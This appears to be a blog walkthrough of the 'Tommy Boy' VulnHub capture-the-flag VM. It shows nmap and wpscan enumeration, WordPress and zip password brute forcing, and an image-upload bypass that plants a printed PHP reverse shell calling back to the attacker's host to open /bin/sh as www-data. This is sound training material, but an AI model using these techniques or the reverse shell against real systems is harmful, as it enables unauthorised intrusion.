This was one of my favorite VM's seeing that it was based on the movie Tommy Boy. I can honestly say it's been a long time since I've seen this movie, but after this VM, it looks like I'll need to set some time aside in the near future to re-watch this classic Chris Farley and David Spade movie.
The objective of this VM was to "restore a backup copy of the homepage to Callahan Auto's server. However, to consider the box fully pwned, you'll need to collect 5 flags strewn about the system, and use the data inside them to unlock one final message."
Sounds simple enough, let's see what it had to take to pwn this box!
Per my usual strategy, I kick off an nmap scan against the entire subnet that is on my VirtualBox interface:
root@localhost:~/VM/tommyboy# nmap 192.168.56.0/24 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-09 16:59 CDT Nmap scan report for 192.168.56.100 Host is up (0.000057s latency). All 1000 scanned ports on 192.168.56.100 are filtered MAC Address: 08:00:27:E1:F0:DE (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.56.101 Host is up (0.00047s latency). Not shown: 997 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8008/tcp open http MAC Address: 08:00:27:11:B5:5C (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.56.1 Host is up (0.0000020s latency). Not shown: 999 closed ports PORT STATE SERVICE 111/tcp open rpcbind Nmap done: 256 IP addresses (3 hosts up) scanned in 7.79 seconds root@localhost:~/VM/tommyboy#
Looks like 192.168.56.101 is the host machine! I see right away that there are 3 ports running, but let's make sure that there's nothing else hidden. I run nmap again, this time against all ports:
root@localhost:~/VM/tommyboy# nmap -p- 192.168.56.101 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-09 17:01 CDT Nmap scan report for 192.168.56.101 Host is up (0.00097s latency). Not shown: 65531 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8008/tcp open http 65534/tcp open unknown MAC Address: 08:00:27:11:B5:5C (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 2.18 seconds root@localhost:~/VM/tommyboy#
Ah-ha! Sneaky sneaky. Appears that another port has been unveiled: 65534. I will make note of this for future research. I still would like more information about this host, so I run nmap again against these 4 ports and add a few more switches in nmap:
root@localhost:~/VM/tommyboy# nmap -p22,80,8008,65534 -sV -A 192.168.56.101 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-09 17:03 CDT Nmap scan report for 192.168.56.101 Host is up (0.00021s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA) |_ 256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 4 disallowed entries | /6packsofb...soda /lukeiamyourfather |_/lookalivelowbridge /flag-numero-uno.txt |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Welcome to Callahan Auto 8008/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: KEEP OUT 65534/tcp open ftp ProFTPD MAC Address: 08:00:27:11:B5:5C (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.4 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.21 ms 192.168.56.101 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.03 seconds root@localhost:~/VM/tommyboy#
Okay great. Looks like we have something to work with now. Right away, I see that there's "flag-numero-uno.txt" as an entry in robots.txt. I grab this flag first and take note of other headers and directories listed on port 80 and 8008:
Flag 1 captured! I keep note of the Flag data:
Flag1 data: B34rcl4ws
Great! Flag 1 is down. Let's keep looking around.
After more enumeration, I open up the source page of the homepage. As suspected, there's some comments that are between Nick and Richard:
<!--Comment from Nick: backup copy is in Big Tom's home folder--> <!--Comment from Richard: can you give me access too? Big Tom's the only one w/password--> <!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time--> <!--Comment from Richard: please, I'll ask nicely--> <!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog--> <!--Comment from Richard: Deal. Where's the blog again?--> <!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8--> <!--Comment from Richard: Ah! How could I forget? Thanks-->
Awesome! I check out the video and see that we're being pointed to prehistoric forest.
I navigate to the page and I'm presented with the Callahan Employee Blog:
I start reading some of the blog posts and find the second flag! It's a comment by Michelle Michelle on Announcing the Callahan internal company blog!" post:
I navigate to the following directory and pick up the second flag:
http://192.168.56.101/prehistoricforest/thisisthesecondflagyayyou.txt
Sweet! Flag 2 has been found. I add this to my list:
Flag1 data: B34rcl4ws Flag2 data: Z4l1nsky
With the second flag under my belt, there still is a lot of work to do. My next step is to enumerate more on this WordPress site. I use wpscan to collect a list of users:
root@localhost:~/VM/tommyboy# wpscan --url http://192.168.56.101/prehistoricforest/ --enumerate u
Wonderful! We have 4 usernames to work with. Let's see if we can get lucky and brute force some of these passwords.
I tried against all 4 usernames and finally had a password crack with the username "tom":
root@localhost:~/VM/tommyboy# wpscan --url http://192.168.56.101/prehistoricforest/ --wordlist ~/tools/rockyou.txt --username tom
After using wpscan, we were able to extract the password for the following user:
username: tom
password: tomtom1
Let's try logging in with our newly found username and password:
And we're in! Time to start navigating around.
Now, I was able to find some great information while logged in as the admin on WordPress, however, most of the data collected will be used later in this VM.
I realize that I need to access this password protected post if I want to go any further. Looking back at the conversation between Richard and Tom Jr under the post "Son of A!", Richard tells Tom Jr to look at the picture in the directory /richard to jog his memory.
Seeing that this is a photo, I decide that there may be some stenography involved. So, I download the picture and run exiftool against it.
root@localhost:~/VM/tommyboy# exiftool shockedrichard.jpg ExifTool Version Number : 10.15 File Name : [...snippet...] Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz. Exif Version : 0220 User Comment : ce154b5a8e59c89732bc25d6a2e6b90b Exif Image Width : 1600 Exif Image Height : 1029 XMP Toolkit : [...snippet...] Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2) Image Size : 1600x1029 Megapixels : 1.6 root@localhost:~/VM/tommyboy#
Well what have we here? I see a User Comment with the following string:
ce154b5a8e59c89732bc25d6a2e6b90b
This looks like an md5 hash to me. So I take it over to HashKiller and run the md5 hash through. It finds a match and the hash was generated from the word "spanky".
By typing in spanky, we are able to view the Protected Message on the WordPress Site.
Looking at the message, Nick was the IT guy and he has now left the company. Luckily for us, he gave the following information to Richard:
You guys are all hopeless sheep :-/ The Callahan Auto Web site is usually pretty stable. But if for some reason the page is ever down, you guys will probably go out of business. But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again. IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore. Warning: Big Tom always forgets his account password. Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called. Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out. I left a few other bits of information in my home folder, which the new guy can access via FTP. Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it. Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for. And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again. Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?). You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password. I removed my SSH access because I *DON’T* want you calling me in case of an emergency. But my creds still work on FTP. Your new fresh fish can connect using my credentials and if he/she has half a brain.
Okay, first things first, I remember when scanning all ports, there was an unknown service under port 65534. This must be the FTP service that Nick is referencing. So, I wait until the top of the hour and the FTP service is up and running again.
I access the FTP service utilizing the following "easy to guess" passwords for nickburns:
username: nickburns
password: nickburns
Once logged into the ftp share, I see a file called readme.txt. I download the file to my local host and cat it's contents:
root@localhost:~/VM/tommyboy# cat readme.txt To my replacement: If you're reading this, you have the unfortunate job of taking over IT responsibilities from me here at Callahan Auto. HAHAHAHAHAAH! SUCKER! This is the worst job ever! You'll be surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn't know a fax machine from a flame thrower! Anyway I'm not completely without mercy. There's a subfolder called "NickIzL33t" on this server somewhere. I used it as my personal dropbox on the company's dime for years. Heh. LOL. I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want to look at on your phone later, consider that folder my gift to you. Oh by the way, Big Tom's a moron and always forgets his passwords and so I made an encrypted .zip of his passwords and put them in the "NickIzL33t" folder as well. But guess what? He always forgets THAT password as well. Luckily I'm a nice guy and left him a hint sheet. Good luck, schmuck! LOL. -Nick root@localhost:~/VM/tommyboy#
Okay, so it looks like there's a subfolder called "NickIzL33t" on the server. I figure that's what port 8008 is being used for. I navigate to the following page and I'm presented with this:
http://192.168.56.101:8008/NickIzL33t
So, this part actually hung me up for a bit. After reading and re-reading what was said, it dawns on me that Nick made a few references that were very important. He drops hints like "phone" and "Steve Jobs". There must be some way I can make it look like I'm coming from an apple/iphone device. Doing some research, there is a setting within BurpSuite that allows you to change your User-Agent to emulate as an iOS device!
As shown above, under Proxy > Options > Match and Replace, there's a way to match the User-Agent and Replace with a regex emulating iOS.
I then navigate to the page again after modifying the settings and I'm presented with a new page:
Nick then mentions that you need to know the EXACT name of the .html to break into the fortress. So I then kick off Dirbuster and edit the following settings:
- User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
- Change directory to start with NicklzL33t
- update extension from php to html
- utilizing the rockyou.txt wordlist
With the switches set, I find the following page:
http://192.168.56.101:8008/NickIzL33t/fallon1.html
Woot! I see a link to the third flag! I navigate to the following address to capture the flag:
http://192.168.56.101:8008/NickIzL33t/flagtres.txt
THREE OF 5 FLAGS - you're awesome sauce. Flag data: TinyHead
Just like the file says, I've captured 3 of the 5 flags. Here's my current list of flags:
Flag1 data: B34rcl4ws Flag2 data: Z4l1nsky Flag3 data: TinyHead
I'm over halfway there, it's time to keep moving. I read the context of hint.txt:
Okay, looks like it's time to generate a wordlist to meet all these requirements. I crunch to accomplish this task. I use the following to generate my password-list:
root@localhost:~/VM/tommyboy# crunch 13 13 -t bev,%%@@^1995 -o crunch.txt
Now that my wordlist has been generated, I download Big Tom's encrypted pw backups file called "t0msp4ssw0rdz.zip".
I utilize fcrackzip to perform brute forcing against the password protected zip file:
root@localhost:~/VM/tommyboy# fcrackzip -D -p crunch.txt -u -v t0msp4ssw0rdz.zip
Awesome! The password used to protect this zip file was:
password: bevH00tr$1995
I unzip the file and read the contents of passwords.txt:
root@localhost:~/VM/tommyboy# cat passwords.txt Sandusky Banking Site ------------------------ Username: BigTommyC Password: money TheKnot.com (wedding site) --------------------------- Username: TomC Password: wedding Callahan Auto Server ---------------------------- Username: bigtommysenior Password: fatguyinalittlecoat Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are. However, I wrote myself a draft on the company blog with that information. Callahan Company Blog ---------------------------- Username: bigtom(I think?) Password: ??? Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song. root@localhost:~/VM/tommyboy#
Okay, so the Callahan Auto Server username and password appear to be the credentials needed to SSH into the server. Remembering what I found on the WordPress site earlier after logging in as admin, there was a draft created by Big Tom saying the following:
If my guess is correct, I should be able to add 1938!! to the end of fatguyinalittlecoat to SSH into the server as bigtommysenior:
username: bigtommysenior
password: fatguyinalittlecoat1938!!
Success!
I take a look around in bigtommysenior's home directory and there are 3 files listed:
bigtommysenior@CallahanAutoSrv01:~$ ls -l total 12 -rw-r--r-- 1 bigtommysenior bigtommysenior 307 Jul 7 14:18 callahanbak.bak -rw-rw-r-- 1 bigtommysenior bigtommysenior 237 Jul 7 15:27 el-flag-numero-quatro.txt -rw-rw-r-- 1 bigtommysenior bigtommysenior 630 Jul 7 17:59 LOOT.ZIP bigtommysenior@CallahanAutoSrv01:~$
What have we here? Is that the 4th flag?!
Why yes it is! Now I have 4 out of 5 flags:
Flag1 data: B34rcl4ws Flag2 data: Z4l1nsky Flag3 data: TinyHead Flag4 data: EditButton
Alright, it's time to find this 5th flag. But first, I need to restore the Callahan Web Page by copying over callahanbak.bak to index.html located in /var/www/html:
bigtommysenior@CallahanAutoSrv01:~$ cp callahanbak.bak /var/www/html/index.html
I navigate to the home page:
Awesome! The webpage has been restored! However, this is not the end. I still need flag 5!
I take the advice from flag 4 and go to the root of the server and look for /5.txt:
bigtommysenior@CallahanAutoSrv01:~$ cd / bigtommysenior@CallahanAutoSrv01:/$ ls -lah total 105K drwxr-xr-x 25 root root 4.0K Jul 15 12:35 . drwxr-xr-x 25 root root 4.0K Jul 15 12:35 .. -rwxr-x--- 1 www-data www-data 520 Jul 7 15:36 .5.txt drwxr-xr-x 2 root root 4.0K Jul 6 08:32 bin drwxr-xr-x 4 root root 1.0K Jul 14 13:38 boot drwxr-xr-x 20 root root 4.1K Aug 11 13:53 dev [...snippet...] bigtommysenior@CallahanAutoSrv01:/$
Interesting. I see 5.txt, however, it's owned by www-data and only that user or members of the www-data group can actually read its contents. There must be a way to switch to this user, or better yet, maybe there's a way to run a process that is owned by www-data and get the file that way...
After some long hard thinking, I realize that since I'm on the server, maybe it's a good idea to see if there was anything else hidden within "nicks" directory:
bigtommysenior@CallahanAutoSrv01:/$ cd /var/ bigtommysenior@CallahanAutoSrv01:/var$ ls backups crash local log opt snap thatsg0nnaleaveamark www cache lib lock mail run spool tmp bigtommysenior@CallahanAutoSrv01:/var$ cd thatsg0nnaleaveamark/ bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark$ ls index.html NickIzL33t bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark$ cd NickIzL33t/ bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t$ ls fallon1.html flagtres.txt hint.txt index.html P4TCH_4D4MS t0msp4ssw0rdz.zip bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t$
Ah-ha! There's a directory called P4TCH_4D4MS within NickIzL33t. I navigate to that directory through the browser:
http://192.168.56.101:8008/NickIzL33t/P4TCH_4D4MS/
Interesting. So there's an option to upload an image to the server.
Also, when I navigate to the P4TCH_4D4MS directory in the server, the uploads directory is world write-able!
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS$ ls -lah total 28K drwxr-xr-x 3 www-data www-data 4.0K Jul 15 12:47 . drwxr-xr-x 3 www-data www-data 4.0K Jul 17 08:19 .. -rw-r--r-- 1 root root 1.6K Jul 15 12:25 backupload.php -rw-r--r-- 1 root root 206 Jul 15 12:25 .htaccess -rw-r--r-- 1 root root 280 Jul 15 12:03 index.html -rw-r--r-- 1 root root 1.6K Jul 15 12:47 upload.php drwxrwxrwx 2 www-data www-data 4.0K Aug 11 20:07 uploads bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS$
I decide that if I want to read the contents of the 5th flag as www-data, then I'll want to upload a reverse shell to the server and catch the shell running as www-data. In order to do this I first need to upload my shell as a .jpg, change the file on the server to a .php and then navigate to the directory its located in and catch the shell! Let's see how this was done:
root@localhost:~/VM/tommyboy# cat geoda.php.jpg <?php // php-reverse-shell - A Reverse Shell implementation in PHP // Copyright (C) 2007 pentestmonkey@pentestmonkey.net [...snippet...] set_time_limit (0); $VERSION = "1.0"; $ip = '192.168.56.1'; // CHANGE THIS $port = 443; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; [...snippet...] // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print "$string\n"; } } ?> root@localhost:~/VM/tommyboy#
As shown above, I have my reverse shell geoda.php.jpg and I upload it to the server.
I then navigate to the server and copy the file and save it as a .php:
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ cp geoda.php.jpg geoda.php bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls geoda.php geoda.php.jpg index.html
Now that my reverse shell is in place, I fire up netcat on port 443 and navigate to where my shell is located:
http://192.168.56.101:8008/NickIzL33t/P4TCH_4D4MS/uploads/geoda.php
Yes! It worked. I then navigate to the root directory and cat flag 5:
Now I have all 5 flags! I then "blob it into one big chunk":
Flag1 data: B34rcl4ws Flag2 data: Z4l1nsky Flag3 data: TinyHead Flag4 data: EditButton Flag5 data: Buttcrack B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack
I then go back to bigtommysenior via SSH and locate the LOOT.ZIP file, unzip it with the newly generated password, and cat the final text file:
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS$ cd ~ bigtommysenior@CallahanAutoSrv01:~$ ls callahanbak.bak el-flag-numero-quatro.txt LOOT.ZIP bigtommysenior@CallahanAutoSrv01:~$ unzip LOOT.ZIP Archive: LOOT.ZIP [LOOT.ZIP] THE-END.txt password: inflating: THE-END.txt bigtommysenior@CallahanAutoSrv01:~$ cat THE-END.txt YOU CAME. YOU SAW. YOU PWNED. Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year. GREAT WORK! I'd love to know that you finished this VM, and/or get your suggestions on how to make the next one better. Please shoot me a note at 7ms @ 7ms.us with subject line "Here comes the meat wagon!" Or, get in touch with me other ways: * Twitter: @7MinSec * IRC (Freenode): #vulnhub (username is braimee) Lastly, please don't forget to check out www.7ms.us and subscribe to the podcast at bit.ly/7minsec </shamelessplugs> Thanks and have a blessed week! -Brian Johnson 7 Minute Security bigtommysenior@CallahanAutoSrv01:~$
Whew! Success!
This was an excellent VM. I was able to use a lot of tools that I've either never used before, tools that I've used but didn't know its full capabilities, or freshen up on tools that I haven't used in a while.
I'd like to thank Brian Johnson for creating such a wonderful VM and of course, VulnHub for hosting this for all of us to learn on